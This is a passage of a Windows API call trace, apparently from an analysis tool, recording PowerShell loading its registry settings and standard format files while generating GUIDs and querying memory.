	[0383.968] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x24cea8 | out: phkResult=0x24cea8*=0x330) returned 0x0
	[0383.968] RegQueryValueExW (in: hKey=0x330, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x24ce2c, lpData=0x0, lpcbData=0x24ce28*=0x0 | out: lpType=0x24ce2c*=0x1, lpData=0x0, lpcbData=0x24ce28*=0x56) returned 0x0
	[0383.968] CoTaskMemAlloc (cb=0x5a) returned 0x171540
	[0383.968] RegQueryValueExW (in: hKey=0x330, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x24cdfc, lpData=0x171540, lpcbData=0x24cdf8*=0x56 | out: lpType=0x24cdfc*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x24cdf8*=0x56) returned 0x0
	[0383.968] CoTaskMemFree (pv=0x171540) 
	[0383.968] RegCloseKey (hKey=0x330) returned 0x0
	[0383.968] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml", nBufferLength=0x105, lpBuffer=0x24caf0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml", lpFilePart=0x0) returned 0x47
	[0383.969] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml", nBufferLength=0x105, lpBuffer=0x24c9a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml", lpFilePart=0x0) returned 0x47
	[0383.970] CoCreateGuid (in: pguid=0x24d0d0 | out: pguid=0x24d0d0*(Data1=0xa964fa89, Data2=0x3482, Data3=0x4847, Data4=([0]=0xbe, [1]=0x8e, [2]=0xf4, [3]=0x39, [4]=0xf4, [5]=0x4e, [6]=0x5f, [7]=0xa4))) returned 0x0
	[0383.970] CoCreateGuid (in: pguid=0x24d0d0 | out: pguid=0x24d0d0*(Data1=0x61a09529, Data2=0x1b68, Data3=0x449d, Data4=([0]=0xbd, [1]=0x42, [2]=0xb9, [3]=0x4a, [4]=0xcf, [5]=0x73, [6]=0xc1, [7]=0x3b))) returned 0x0
	[0383.970] CoCreateGuid (in: pguid=0x24d0d0 | out: pguid=0x24d0d0*(Data1=0x47b693cc, Data2=0x6b9d, Data3=0x48ba, Data4=([0]=0x9e, [1]=0xce, [2]=0xd4, [3]=0x6c, [4]=0xd7, [5]=0x95, [6]=0x57, [7]=0x5c))) returned 0x0
	[0383.970] CoCreateGuid (in: pguid=0x24d0d0 | out: pguid=0x24d0d0*(Data1=0x38cedfb, Data2=0xebd, Data3=0x4bd2, Data4=([0]=0x8c, [1]=0x34, [2]=0xeb, [3]=0x5, [4]=0x6c, [5]=0x92, [6]=0xb9, [7]=0xaa))) returned 0x0
	[0383.970] CoCreateGuid (in: pguid=0x24d0d0 | out: pguid=0x24d0d0*(Data1=0xe21451fa, Data2=0xc64, Data3=0x4f7f, Data4=([0]=0xa7, [1]=0xff, [2]=0xee, [3]=0xdf, [4]=0xdd, [5]=0x6d, [6]=0xb0, [7]=0x19))) returned 0x0
	[0383.970] CoCreateGuid (in: pguid=0x24d0d0 | out: pguid=0x24d0d0*(Data1=0x6d4d7d92, Data2=0x6f3a, Data3=0x4dbb, Data4=([0]=0xaf, [1]=0x20, [2]=0xf7, [3]=0x42, [4]=0x5c, [5]=0x93, [6]=0x5a, [7]=0xab))) returned 0x0
	[0383.970] CoCreateGuid (in: pguid=0x24d0d0 | out: pguid=0x24d0d0*(Data1=0xbfca7b28, Data2=0xbbeb, Data3=0x4beb, Data4=([0]=0x98, [1]=0xcc, [2]=0x32, [3]=0x9c, [4]=0x73, [5]=0x9f, [6]=0xdd, [7]=0x38))) returned 0x0
	[0383.970] VirtualQuery (in: lpAddress=0x24ba80, lpBuffer=0x24c940, dwLength=0x30 | out: lpBuffer=0x24c940*(BaseAddress=0x24b000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0383.971] CoCreateGuid (in: pguid=0x24d0d0 | out: pguid=0x24d0d0*(Data1=0x7cc224bb, Data2=0x5f88, Data3=0x4fbe, Data4=([0]=0xa7, [1]=0x23, [2]=0x6, [3]=0x5e, [4]=0xc2, [5]=0xb0, [6]=0x83, [7]=0x6b))) returned 0x0
	[0383.971] CoCreateGuid (in: pguid=0x24d0d0 | out: pguid=0x24d0d0*(Data1=0x3b2b3129, Data2=0x29e8, Data3=0x42b2, Data4=([0]=0x9e, [1]=0xe8, [2]=0x26, [3]=0x7c, [4]=0xce, [5]=0xbf, [6]=0xf, [7]=0x3))) returned 0x0
	[0383.971] CoCreateGuid (in: pguid=0x24d0d0 | out: pguid=0x24d0d0*(Data1=0x1386ffe1, Data2=0x1136, Data3=0x404c, Data4=([0]=0xb0, [1]=0x4d, [2]=0xea, [3]=0xbb, [4]=0xff, [5]=0x8c, [6]=0x72, [7]=0x19))) returned 0x0
	[0383.971] CoCreateGuid (in: pguid=0x24d0d0 | out: pguid=0x24d0d0*(Data1=0x58e0eb89, Data2=0xaa2a, Data3=0x4ad7, Data4=([0]=0xae, [1]=0x22, [2]=0x29, [3]=0xbe, [4]=0xa4, [5]=0xad, [6]=0xeb, [7]=0x3b))) returned 0x0
	[0383.971] CoCreateGuid (in: pguid=0x24d0d0 | out: pguid=0x24d0d0*(Data1=0x7443fde1, Data2=0xd0a, Data3=0x4e9f, Data4=([0]=0xa2, [1]=0x23, [2]=0xd5, [3]=0x40, [4]=0x26, [5]=0x3e, [6]=0x45, [7]=0x80))) returned 0x0
	[0383.971] CoCreateGuid (in: pguid=0x24d0d0 | out: pguid=0x24d0d0*(Data1=0x64118d5f, Data2=0xcdfc, Data3=0x4ee2, Data4=([0]=0xbb, [1]=0x9b, [2]=0x9f, [3]=0xf0, [4]=0x66, [5]=0x1c, [6]=0x8d, [7]=0xde))) returned 0x0
	[0383.971] CoCreateGuid (in: pguid=0x24d0d0 | out: pguid=0x24d0d0*(Data1=0x9ffefc8a, Data2=0xf2dd, Data3=0x4a82, Data4=([0]=0xb3, [1]=0xa7, [2]=0x1b, [3]=0xa8, [4]=0x20, [5]=0x61, [6]=0xa7, [7]=0xba))) returned 0x0
	[0383.971] CoCreateGuid (in: pguid=0x24d0d0 | out: pguid=0x24d0d0*(Data1=0xf46cd54f, Data2=0x815e, Data3=0x43e4, Data4=([0]=0xbb, [1]=0x83, [2]=0xbd, [3]=0x6a, [4]=0xb7, [5]=0xea, [6]=0x4f, [7]=0x78))) returned 0x0
	[0383.971] CoCreateGuid (in: pguid=0x24d0d0 | out: pguid=0x24d0d0*(Data1=0x8cb6f133, Data2=0x9faa, Data3=0x4036, Data4=([0]=0x9e, [1]=0xb8, [2]=0x53, [3]=0x27, [4]=0xf7, [5]=0x7c, [6]=0x73, [7]=0x71))) returned 0x0
	[0383.972] CoCreateGuid (in: pguid=0x24d0d0 | out: pguid=0x24d0d0*(Data1=0x924dea57, Data2=0x83b3, Data3=0x450a, Data4=([0]=0xac, [1]=0x99, [2]=0xb4, [3]=0xf7, [4]=0x26, [5]=0xb7, [6]=0x15, [7]=0xe3))) returned 0x0
	[0383.972] CoCreateGuid (in: pguid=0x24d0d0 | out: pguid=0x24d0d0*(Data1=0xee9f8537, Data2=0x886c, Data3=0x4197, Data4=([0]=0x8b, [1]=0x2f, [2]=0xfb, [3]=0xf6, [4]=0x47, [5]=0xc2, [6]=0xe2, [7]=0x3d))) returned 0x0
	[0383.972] CoCreateGuid (in: pguid=0x24d0d0 | out: pguid=0x24d0d0*(Data1=0x59bc40fc, Data2=0x6c38, Data3=0x4e6b, Data4=([0]=0xb0, [1]=0x96, [2]=0xd3, [3]=0x43, [4]=0xa1, [5]=0x96, [6]=0x2c, [7]=0xf4))) returned 0x0
	[0383.972] VirtualQuery (in: lpAddress=0x24ba80, lpBuffer=0x24c940, dwLength=0x30 | out: lpBuffer=0x24c940*(BaseAddress=0x24b000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0383.972] VirtualQuery (in: lpAddress=0x24ba80, lpBuffer=0x24c940, dwLength=0x30 | out: lpBuffer=0x24c940*(BaseAddress=0x24b000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0383.972] VirtualQuery (in: lpAddress=0x24ba80, lpBuffer=0x24c940, dwLength=0x30 | out: lpBuffer=0x24c940*(BaseAddress=0x24b000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0383.972] CoCreateGuid (in: pguid=0x24d0d0 | out: pguid=0x24d0d0*(Data1=0x55e3c5b4, Data2=0xd80e, Data3=0x4c63, Data4=([0]=0xb2, [1]=0x11, [2]=0xb0, [3]=0xd1, [4]=0x83, [5]=0xb3, [6]=0x88, [7]=0xb7))) returned 0x0
	[0383.972] CoCreateGuid (in: pguid=0x24d0d0 | out: pguid=0x24d0d0*(Data1=0xa8bc86f2, Data2=0x3e62, Data3=0x4790, Data4=([0]=0x8d, [1]=0x89, [2]=0x4e, [3]=0xbe, [4]=0xa0, [5]=0xc7, [6]=0x96, [7]=0xf2))) returned 0x0
	[0383.972] CoCreateGuid (in: pguid=0x24d0d0 | out: pguid=0x24d0d0*(Data1=0x38af9379, Data2=0xaa3f, Data3=0x492a, Data4=([0]=0xae, [1]=0x81, [2]=0x85, [3]=0x76, [4]=0x33, [5]=0xc4, [6]=0xff, [7]=0x78))) returned 0x0
	[0383.973] CoCreateGuid (in: pguid=0x24d0d0 | out: pguid=0x24d0d0*(Data1=0x5f0bf2f1, Data2=0xf037, Data3=0x4536, Data4=([0]=0x8c, [1]=0xd, [2]=0xfc, [3]=0x91, [4]=0xfe, [5]=0x67, [6]=0x2b, [7]=0x91))) returned 0x0
	[0383.973] CoCreateGuid (in: pguid=0x24d0d0 | out: pguid=0x24d0d0*(Data1=0x802f7ec8, Data2=0x4369, Data3=0x42c8, Data4=([0]=0xaf, [1]=0x59, [2]=0x4e, [3]=0xe5, [4]=0x6b, [5]=0x8f, [6]=0x19, [7]=0x1c))) returned 0x0
	[0383.973] CoCreateGuid (in: pguid=0x24d0d0 | out: pguid=0x24d0d0*(Data1=0x24280e97, Data2=0x8c4e, Data3=0x46cd, Data4=([0]=0x8a, [1]=0x32, [2]=0xa6, [3]=0xc8, [4]=0x20, [5]=0x4d, [6]=0xfe, [7]=0x23))) returned 0x0
	[0383.973] CoCreateGuid (in: pguid=0x24d0d0 | out: pguid=0x24d0d0*(Data1=0xa4157941, Data2=0xff23, Data3=0x43d7, Data4=([0]=0x80, [1]=0xa3, [2]=0x9b, [3]=0x62, [4]=0x7e, [5]=0xb8, [6]=0xa5, [7]=0x30))) returned 0x0
	[0383.973] CoCreateGuid (in: pguid=0x24d0d0 | out: pguid=0x24d0d0*(Data1=0x18a48fd, Data2=0xe8e9, Data3=0x43a8, Data4=([0]=0xae, [1]=0xa4, [2]=0x48, [3]=0xa9, [4]=0x8d, [5]=0xfd, [6]=0x7e, [7]=0x39))) returned 0x0
	[0383.973] CoCreateGuid (in: pguid=0x24d0d0 | out: pguid=0x24d0d0*(Data1=0xe54425f, Data2=0xf2c3, Data3=0x4644, Data4=([0]=0x81, [1]=0x42, [2]=0x6d, [3]=0xb8, [4]=0x87, [5]=0x8b, [6]=0xcf, [7]=0x63))) returned 0x0
	[0383.973] CoCreateGuid (in: pguid=0x24d0d0 | out: pguid=0x24d0d0*(Data1=0xc01f622e, Data2=0x157b, Data3=0x421e, Data4=([0]=0x95, [1]=0x3e, [2]=0xd3, [3]=0xa9, [4]=0x55, [5]=0x36, [6]=0xd1, [7]=0x26))) returned 0x0
	[0383.973] CoCreateGuid (in: pguid=0x24d0d0 | out: pguid=0x24d0d0*(Data1=0x19f3694e, Data2=0xc982, Data3=0x49a5, Data4=([0]=0x9e, [1]=0x76, [2]=0x23, [3]=0x8a, [4]=0x9b, [5]=0x9, [6]=0xd4, [7]=0x81))) returned 0x0
	[0383.973] CoCreateGuid (in: pguid=0x24d0d0 | out: pguid=0x24d0d0*(Data1=0xe36ca746, Data2=0x5564, Data3=0x4af0, Data4=([0]=0x92, [1]=0x77, [2]=0xc7, [3]=0x68, [4]=0xdb, [5]=0x68, [6]=0x74, [7]=0xb3))) returned 0x0
	[0383.973] CoCreateGuid (in: pguid=0x24d0d0 | out: pguid=0x24d0d0*(Data1=0x621a3cbf, Data2=0x2d6c, Data3=0x468f, Data4=([0]=0xa6, [1]=0x86, [2]=0xf6, [3]=0xbe, [4]=0xa, [5]=0x6f, [6]=0x95, [7]=0x95))) returned 0x0
	[0383.974] VirtualQuery (in: lpAddress=0x24ba80, lpBuffer=0x24c940, dwLength=0x30 | out: lpBuffer=0x24c940*(BaseAddress=0x24b000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0383.974] CoCreateGuid (in: pguid=0x24d0d0 | out: pguid=0x24d0d0*(Data1=0xa6682087, Data2=0xad4d, Data3=0x4122, Data4=([0]=0x89, [1]=0xb8, [2]=0x85, [3]=0xb8, [4]=0xc7, [5]=0x7, [6]=0xdd, [7]=0x6f))) returned 0x0
	[0383.974] VirtualQuery (in: lpAddress=0x24ba80, lpBuffer=0x24c940, dwLength=0x30 | out: lpBuffer=0x24c940*(BaseAddress=0x24b000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0383.974] VirtualQuery (in: lpAddress=0x24ba80, lpBuffer=0x24c940, dwLength=0x30 | out: lpBuffer=0x24c940*(BaseAddress=0x24b000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0383.975] CoCreateGuid (in: pguid=0x24d0d0 | out: pguid=0x24d0d0*(Data1=0xe8e5d801, Data2=0x5a34, Data3=0x49f9, Data4=([0]=0xaf, [1]=0xf6, [2]=0x9a, [3]=0xba, [4]=0x7b, [5]=0x20, [6]=0xe4, [7]=0xd9))) returned 0x0
	[0383.975] VirtualQuery (in: lpAddress=0x24ba80, lpBuffer=0x24c940, dwLength=0x30 | out: lpBuffer=0x24c940*(BaseAddress=0x24b000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0383.975] CoCreateGuid (in: pguid=0x24d0d0 | out: pguid=0x24d0d0*(Data1=0x148ee0b6, Data2=0x10b, Data3=0x4370, Data4=([0]=0xb7, [1]=0xa6, [2]=0x92, [3]=0x82, [4]=0xc9, [5]=0xd8, [6]=0x6e, [7]=0x1d))) returned 0x0
	[0383.975] CoCreateGuid (in: pguid=0x24d0d0 | out: pguid=0x24d0d0*(Data1=0xfbf9f74, Data2=0xc02f, Data3=0x4837, Data4=([0]=0x92, [1]=0x50, [2]=0x51, [3]=0x8e, [4]=0xbe, [5]=0x45, [6]=0x1d, [7]=0x10))) returned 0x0
	[0383.976] CoCreateGuid (in: pguid=0x24d0d0 | out: pguid=0x24d0d0*(Data1=0x9697fe80, Data2=0x1084, Data3=0x47da, Data4=([0]=0x9c, [1]=0x44, [2]=0x48, [3]=0x1, [4]=0xac, [5]=0xe9, [6]=0x30, [7]=0x98))) returned 0x0
	[0383.976] CoCreateGuid (in: pguid=0x24d0d0 | out: pguid=0x24d0d0*(Data1=0x3a950483, Data2=0x19e5, Data3=0x4c00, Data4=([0]=0xb0, [1]=0xfe, [2]=0xf5, [3]=0x1, [4]=0x48, [5]=0xf4, [6]=0xa1, [7]=0x3))) returned 0x0
	[0383.976] CoCreateGuid (in: pguid=0x24d0d0 | out: pguid=0x24d0d0*(Data1=0xaf995773, Data2=0x72e1, Data3=0x41d4, Data4=([0]=0xb8, [1]=0x73, [2]=0x92, [3]=0xe7, [4]=0xc3, [5]=0x40, [6]=0x5d, [7]=0xde))) returned 0x0
	[0383.976] CoCreateGuid (in: pguid=0x24d0d0 | out: pguid=0x24d0d0*(Data1=0x4609500b, Data2=0x9b6b, Data3=0x4813, Data4=([0]=0xa6, [1]=0xca, [2]=0xba, [3]=0x46, [4]=0x8a, [5]=0xcc, [6]=0xdc, [7]=0xe4))) returned 0x0
	[0383.976] CoCreateGuid (in: pguid=0x24d0d0 | out: pguid=0x24d0d0*(Data1=0xfdf703d2, Data2=0x6b15, Data3=0x4928, Data4=([0]=0x92, [1]=0x9b, [2]=0x6e, [3]=0x7d, [4]=0x7, [5]=0xf7, [6]=0x7d, [7]=0xea))) returned 0x0
	[0383.976] VirtualQuery (in: lpAddress=0x24ba80, lpBuffer=0x24c940, dwLength=0x30 | out: lpBuffer=0x24c940*(BaseAddress=0x24b000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0383.976] CoCreateGuid (in: pguid=0x24d0d0 | out: pguid=0x24d0d0*(Data1=0x989e8aae, Data2=0x8242, Data3=0x4102, Data4=([0]=0x8e, [1]=0xae, [2]=0xc0, [3]=0x37, [4]=0x2a, [5]=0x2e, [6]=0xa4, [7]=0x10))) returned 0x0
	[0383.976] CoCreateGuid (in: pguid=0x24d0d0 | out: pguid=0x24d0d0*(Data1=0x18f28663, Data2=0x4ab3, Data3=0x4a1d, Data4=([0]=0xa9, [1]=0x31, [2]=0x67, [3]=0x65, [4]=0xff, [5]=0xe1, [6]=0x31, [7]=0xed))) returned 0x0
	[0383.976] CoCreateGuid (in: pguid=0x24d0d0 | out: pguid=0x24d0d0*(Data1=0x73760eae, Data2=0x777, Data3=0x4e0f, Data4=([0]=0xb3, [1]=0x26, [2]=0xeb, [3]=0x55, [4]=0x4c, [5]=0xa3, [6]=0x75, [7]=0x3b))) returned 0x0
	[0383.977] CoCreateGuid (in: pguid=0x24d0d0 | out: pguid=0x24d0d0*(Data1=0x442d3293, Data2=0xe1cb, Data3=0x49ec, Data4=([0]=0x86, [1]=0x86, [2]=0x0, [3]=0x7d, [4]=0x47, [5]=0xd5, [6]=0xf1, [7]=0xe2))) returned 0x0
	[0383.977] CoCreateGuid (in: pguid=0x24d0d0 | out: pguid=0x24d0d0*(Data1=0x2023ca16, Data2=0xea7b, Data3=0x4b95, Data4=([0]=0xba, [1]=0xb5, [2]=0x94, [3]=0x89, [4]=0x7c, [5]=0x33, [6]=0x1c, [7]=0x74))) returned 0x0
	[0383.977] VirtualQuery (in: lpAddress=0x24ba80, lpBuffer=0x24c940, dwLength=0x30 | out: lpBuffer=0x24c940*(BaseAddress=0x24b000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0383.977] CoCreateGuid (in: pguid=0x24d0d0 | out: pguid=0x24d0d0*(Data1=0x8522f713, Data2=0xf6ba, Data3=0x4f22, Data4=([0]=0x92, [1]=0xe0, [2]=0x3, [3]=0x8d, [4]=0xdc, [5]=0xbc, [6]=0xda, [7]=0xfc))) returned 0x0
	[0383.977] CoCreateGuid (in: pguid=0x24d0d0 | out: pguid=0x24d0d0*(Data1=0x78c411ed, Data2=0x4d55, Data3=0x4c41, Data4=([0]=0xbb, [1]=0xaa, [2]=0x4a, [3]=0xb2, [4]=0xb7, [5]=0x7d, [6]=0x5, [7]=0xfa))) returned 0x0
	[0383.977] VirtualQuery (in: lpAddress=0x24baf0, lpBuffer=0x24c9b0, dwLength=0x30 | out: lpBuffer=0x24c9b0*(BaseAddress=0x24b000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0383.977] VirtualQuery (in: lpAddress=0x24baf0, lpBuffer=0x24c9b0, dwLength=0x30 | out: lpBuffer=0x24c9b0*(BaseAddress=0x24b000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0383.977] VirtualQuery (in: lpAddress=0x24baf0, lpBuffer=0x24c9b0, dwLength=0x30 | out: lpBuffer=0x24c9b0*(BaseAddress=0x24b000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0383.977] VirtualQuery (in: lpAddress=0x24baf0, lpBuffer=0x24c9b0, dwLength=0x30 | out: lpBuffer=0x24c9b0*(BaseAddress=0x24b000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0383.978] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", nBufferLength=0x105, lpBuffer=0x24c890, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", lpFilePart=0x0) returned 0x48
	[0383.978] SetErrorMode (uMode=0x1) returned 0x1
	[0383.978] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershelltrace.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x330
	[0383.978] GetFileType (hFile=0x330) returned 0x1
	[0383.978] SetErrorMode (uMode=0x1) returned 0x1
	[0383.978] GetFileType (hFile=0x330) returned 0x1
	[0383.978] ReadFile (in: hFile=0x330, lpBuffer=0x3029948, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24ce18, lpOverlapped=0x0 | out: lpBuffer=0x3029948*, lpNumberOfBytesRead=0x24ce18*=0x1000, lpOverlapped=0x0) returned 1
	[0383.979] ReadFile (in: hFile=0x330, lpBuffer=0x3029948, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24ce18, lpOverlapped=0x0 | out: lpBuffer=0x3029948*, lpNumberOfBytesRead=0x24ce18*=0x1000, lpOverlapped=0x0) returned 1
	[0383.979] ReadFile (in: hFile=0x330, lpBuffer=0x3029948, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24ce18, lpOverlapped=0x0 | out: lpBuffer=0x3029948*, lpNumberOfBytesRead=0x24ce18*=0x1000, lpOverlapped=0x0) returned 1
	[0383.979] ReadFile (in: hFile=0x330, lpBuffer=0x3029948, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24ce18, lpOverlapped=0x0 | out: lpBuffer=0x3029948*, lpNumberOfBytesRead=0x24ce18*=0x1000, lpOverlapped=0x0) returned 1
	[0383.979] ReadFile (in: hFile=0x330, lpBuffer=0x3029948, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24ce18, lpOverlapped=0x0 | out: lpBuffer=0x3029948*, lpNumberOfBytesRead=0x24ce18*=0x8b4, lpOverlapped=0x0) returned 1
	[0383.980] ReadFile (in: hFile=0x330, lpBuffer=0x3028d64, nNumberOfBytesToRead=0x34c, lpNumberOfBytesRead=0x24ce18, lpOverlapped=0x0 | out: lpBuffer=0x3028d64*, lpNumberOfBytesRead=0x24ce18*=0x0, lpOverlapped=0x0) returned 1
	[0383.980] ReadFile (in: hFile=0x330, lpBuffer=0x3029948, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24ce18, lpOverlapped=0x0 | out: lpBuffer=0x3029948*, lpNumberOfBytesRead=0x24ce18*=0x0, lpOverlapped=0x0) returned 1
	[0383.980] CloseHandle (hObject=0x330) returned 1
	[0383.980] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", nBufferLength=0x105, lpBuffer=0x24cb60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", lpFilePart=0x0) returned 0x48
	[0383.980] SetErrorMode (uMode=0x1) returned 0x1
	[0383.980] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershelltrace.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x24cdc0 | out: lpFileInformation=0x24cdc0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67eea05d, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67eea05d, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe601915b, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x48b4)) returned 1
	[0383.980] SetErrorMode (uMode=0x1) returned 0x1
	[0383.980] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", nBufferLength=0x105, lpBuffer=0x24caf0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", lpFilePart=0x0) returned 0x48
	[0383.980] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x24cea8 | out: phkResult=0x24cea8*=0x330) returned 0x0
	[0383.980] RegQueryValueExW (in: hKey=0x330, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x24ce2c, lpData=0x0, lpcbData=0x24ce28*=0x0 | out: lpType=0x24ce2c*=0x1, lpData=0x0, lpcbData=0x24ce28*=0x56) returned 0x0
	[0383.981] CoTaskMemAlloc (cb=0x5a) returned 0x171540
	[0383.981] RegQueryValueExW (in: hKey=0x330, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x24cdfc, lpData=0x171540, lpcbData=0x24cdf8*=0x56 | out: lpType=0x24cdfc*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x24cdf8*=0x56) returned 0x0
	[0383.981] CoTaskMemFree (pv=0x171540) 
	[0383.981] RegCloseKey (hKey=0x330) returned 0x0
	[0383.981] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", nBufferLength=0x105, lpBuffer=0x24caf0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", lpFilePart=0x0) returned 0x48
	[0383.981] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", nBufferLength=0x105, lpBuffer=0x24c9a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", lpFilePart=0x0) returned 0x48
	[0383.981] CoCreateGuid (in: pguid=0x24d0d0 | out: pguid=0x24d0d0*(Data1=0xf0b439f3, Data2=0x2c25, Data3=0x43f3, Data4=([0]=0xa4, [1]=0xc4, [2]=0xc4, [3]=0x51, [4]=0x10, [5]=0xf7, [6]=0x71, [7]=0x41))) returned 0x0
	[0383.981] CoCreateGuid (in: pguid=0x24d0d0 | out: pguid=0x24d0d0*(Data1=0xc2c09d9d, Data2=0xed9, Data3=0x4959, Data4=([0]=0x86, [1]=0xf5, [2]=0x39, [3]=0x3d, [4]=0x37, [5]=0x77, [6]=0xb5, [7]=0x13))) returned 0x0
	[0383.981] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", nBufferLength=0x105, lpBuffer=0x24c890, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", lpFilePart=0x0) returned 0x41
	[0383.982] SetErrorMode (uMode=0x1) returned 0x1
	[0383.982] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\registry.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x330
	[0383.982] GetFileType (hFile=0x330) returned 0x1
